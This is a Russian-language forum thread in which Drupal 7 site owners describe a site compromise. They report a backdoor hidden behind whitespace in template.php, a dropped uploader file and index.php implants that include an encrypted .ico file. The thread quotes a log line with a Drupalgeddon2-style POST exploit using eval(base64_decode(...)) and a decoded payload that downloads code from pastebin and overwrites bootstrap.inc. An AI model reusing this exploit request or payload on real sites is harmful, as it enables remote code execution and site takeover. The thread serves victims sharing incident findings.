Опять появился, при очередном ковырянии нашел похоже.... заразили в базовой теме template.php

на 1й строчке, после <?php внесено ведро и маленькая тележка пробелов и потом 1й строчкой закладка

по F4 не видно, если не прокручивать окно вправо, по F3 увидел сразу как только включил перенос слов.

также идут запросы в папку /modules/simpletest/tests/upgrade, но вроде безрезультатно

Вдруг кому поможет, выловил я у себя еще одну хрень, потому как в субботу вирус вернулся на место.
Короче посмотрел по дате изменения папки время до минуты и посмотрел в логах все запросы в эту минуту.

Видимо ранее (на ядре 7,51) был залит интегратор, вот такой путь /sites/all/themes/zen/phtvzgwy.php
файлик небольшой, всего 1673байта, видимо он и заливает все куда надо хакерам.

ща удалили, посмотрим...

Вот че накопал в логах
2001:41d0:a:54dd:: - - [23/Apr/2018:20:39:55 +0300] "POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=array_map&name%5B%23suffix%5D=eval%28base64_decode%28%22JGt1cmQ9YmFzZTY0X2RlY29k(и там куча всего)

после дешифровки в тексте болтается:

$text2 = file_get_contents('https://pastebin.com/raw/j0nms59V');
$open2=fopen("includes/bootstrap.inc", "w");
fwrite($open2, $text2);
fclose($open2);

с приветом от
HaCkeD by MuhmadEmad
KurDish HaCk3rS WaS Here

сейчас снова словил вирус при попытке обновить wysiwyg_ckeditor через drush

Сегодня вот тоже обнаружил левый код на сайте, который появился 2 недели назад, причем не в sites/.... , а в папках ядра. Ядро было старое(7.51), обновил и по удалял все закладки.

Закладки появились в виде файлов index.php в папках:
/cgi-bin
/misc (и во всех вложеных папках)
/profiles (и во всех вложеных папках)
/scripts
/themes (во всех базовых темах)

везде одно зашифрованное include на файл favicon_a2eef2.ico, который поместили также в /modules/simpletest/lib/favicon_a2eef2.ico